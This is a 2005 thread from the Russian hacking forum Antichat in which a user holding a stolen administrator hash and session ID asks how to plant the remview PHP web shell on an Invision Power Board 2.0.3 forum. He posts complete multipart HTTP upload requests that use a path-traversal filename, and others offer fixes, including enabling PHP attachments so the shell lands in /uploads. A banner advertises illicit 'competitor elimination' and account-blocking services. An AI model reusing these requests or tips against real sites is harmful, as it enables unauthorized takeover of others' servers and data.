Форум АНТИЧАТ - Вопрос про заливку шелла в IPB, посредством программы InetCrack

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Вопрос про заливку шелла в IPB, посредством программы InetCrack

Страница 1 из 3

Опции темы

Поиск в этой теме

Опции просмотра

Вопрос про заливку шелла в IPB, посредством программы InetCrack

05.06.2005, 14:54

MDD

Новичок

Регистрация: 05.06.2005

Сообщений: 16

Провел на форуме:
0

Репутация: 0

Вопрос про заливку шелла в IPB, посредством программы InetCrack

Господа, здравствуйте!
Есть форум IPB 2.0.3
Есть hash админа
Есть session_id админа
Собственно и в админку могу зайти (пароль админа тоже знаю)
Но пермишны на папку со смайлами стоят неправильные и remview туда залить не могу.
Попытался InetCrack-ом по статье товарища Algol-а (http://antichat.ru/txt/IPB) подменить запрос чтобы залить remview в /uploads (эта папка открыта на запись), но не получилось.
Вот что я делал
1. Взял InetCrack
2. Пишу вот такой запрос в InetCrack-е

--------

POST http://АДРЕС_ФОРУМА/admin.php?adsess=СЕССИЯ_АДМИНА HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://АДРЕС_ФОРУМА/admin.php?adsess...ct=op&code=emo
Accept-Language: ru
Content-Type: multipart/form-data; boundary=---------------------------7d43942c405bc
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 677
Pragma: no-cache
Cookie: member_id=ID_АДМИНА; pass_hash=ХЕШ_АДМИНА;

-----------------------------7d43942c405bc
Content-Disposition: form-data; name="adsess"

СЕССИЯ_АДМИНА
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="code"

emo_upload
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="act"

op
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000000
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="FILE_UPLOAD"; filename="../../uploads/REMVIEW.PHP"
Content-Type: application/octet-stream

Сюда, я так понял нада писать код remview-а
-----------------------------7d43942c405bc--

--------

В ответ получаю ответ сервера и когда клацаю в InetCrack-е кнопку "Show body in browser" появляется окно броузера, в котором вижу кусок админки IPB-форума с надписью "Вы не выбрали папку для загрузки смайликов"
При этом ни в папке смайлов ни в папке /uploads не появляется файл remview.php

Подскажите, пожалуйста, что я делаю не так
Может не тот запрос в InetCrack запихиваю
Не могли бы написать 100%-но рабочий HTTP-запрос для IPB версии 2.0.3
Заранее очень благодарен!!!

Еще я понял, что можно как-то через заливку аватаров попытаться залить remview.
Подскажите, пожалуйста, как???

Последний раз редактировалось MDD; 05.06.2005 в 14:57..

05.06.2005, 15:00

~~bul666~~

Banned

Регистрация: 21.04.2005

Сообщений: 328

Провел на форуме:
632524

Репутация: 9

Отправить сообщение для bul666 с помощью ICQ

Проверь правильность session_id Админа.

05.06.2005, 15:07

S1nt3z

Новичок

Регистрация: 02.06.2005

Сообщений: 21

Провел на форуме:
10965

Репутация: 0

В IPB 2.0.3 надо ставить не admin.php?adsess= , а admin.php?s=

05.06.2005, 15:08

MDD

Новичок

Регистрация: 05.06.2005

Сообщений: 16

Провел на форуме:
0

Репутация: 0

Цитата:

Сообщение от bul666

Проверь правильность session_id Админа.

дык я ж ее беру из ссылки
Т.е. захожу в админку под логином/паролем админа и из УРЛ-а браузера беру session_id
Тем более если бы был неправильный session_id, то я думаю, что мне бы это написало, а так пишел, что я не выбрал папку для загрузки смайлика

05.06.2005, 15:12

~~bul666~~

Banned

Регистрация: 21.04.2005

Сообщений: 328

Провел на форуме:
632524

Репутация: 9

Я не понял где файл который ты загружаешь?

05.06.2005, 15:13

MDD

Новичок

Регистрация: 05.06.2005

Сообщений: 16

Провел на форуме:
0

Репутация: 0

Цитата:

Сообщение от S1nt3z

В IPB 2.0.3 надо ставить не admin.php?adsess= , а admin.php?s=

тока шо зашел на тот форум под логино/паролем и урл выглядит вот в таком формате
http://АДРЕС_ФОРУМА/admin.php?printframes=1&adsess=СЕССИЯ_АДМИНА&
т.е. получается все-таки admin.php?adsess=, а не admin.php?s=

05.06.2005, 15:15

MDD

Новичок

Регистрация: 05.06.2005

Сообщений: 16

Провел на форуме:
0

Репутация: 0

Цитата:

Сообщение от bul666

Я не понял где файл который ты загружаешь?

да я так понял что нада не файл, а сам КОД этого файла писать в НТТР-запрос
Вот сюда
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000000
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="FILE_UPLOAD"; filename="../../uploads/REMVIEW.PHP"
Content-Type: application/octet-stream

ВОТ СЮДА ПИШУ КОД remview.php
-----------------------------7d43942c405bc--

Других методов как его приаттачить я не вижу

05.06.2005, 15:18

~~bul666~~

Banned

Регистрация: 21.04.2005

Сообщений: 328

Провел на форуме:
632524

Репутация: 9

А все-таки попробуй по совету S1nt3za Отпровь в Инет Кряке запрос с алреслом : POST http://АДРЕС_ФОРУМА/admin.php?s=СЕССИЯ_АДМИНА HTTP/1.0

05.06.2005, 15:56

MDD

Новичок

Регистрация: 05.06.2005

Сообщений: 16

Провел на форуме:
0

Репутация: 0

Поставил admin.php?s=
не помогло
еще нашел что вместо act=op нада писать act=admin

В итоге вот что получилось

POST http://АДРЕС_ФОРУМА/admin.php? HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://АДРЕС_ФОРУМА/admin.php?act=op&code=emo
Accept-Language: ru
Content-Type: multipart/form-data; boundary=---------------------------7d43942c405bc
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 677
Pragma: no-cache
Cookie: member_id=3; pass_hash=ХЕШ_АДМИНА;

-----------------------------7d43942c405bc
Content-Disposition: form-data; name="adsess"

0ba3d31d16ebfc45939b7a14e510742f
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="code"

emo_upload
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="act"

admin
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000000
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="FILE_UPLOAD"; filename="../../uploads/ad_smiles.php"
Content-Type: application/octet-stream

--CODE HERE--
-----------------------------7d43942c405bc--

все-равно не помогает
та же херня "Вы не выбрали директорию для загрузки смайлов"

Господа, ну помогите, пожалуйста!!!

#10

05.06.2005, 17:10

S1nt3z

Новичок

Регистрация: 02.06.2005

Сообщений: 21

Провел на форуме:
10965

Репутация: 0

Короче самый лёгкий способ это прицепить remview.php в темку (перед этим надо разрешить прикрепление php в темки) он автоматически зальётся в папку uploads , а далее дело техники !

Страница 1 из 3

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
ЕсТь ВоПрос	Guma	Чаты	4	26.10.2005 21:48
Вопрос про заливку шелла в Invision Power Board	DiNo	Форумы	14	03.03.2005 13:40
Вопрос про заливку шелла в Powered by phpBB 2.0.8 © 2001 phpBB Group	onyx3	Форумы	38	15.02.2005 16:25
Вопрос про заливку шелла в Xoops & phpBB	Stanx	Форумы	3	30.01.2005 13:39
Вопрос про заливку шелла через уязвимость в highligh	rsha1988	Форумы	33	21.01.2005 20:40

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход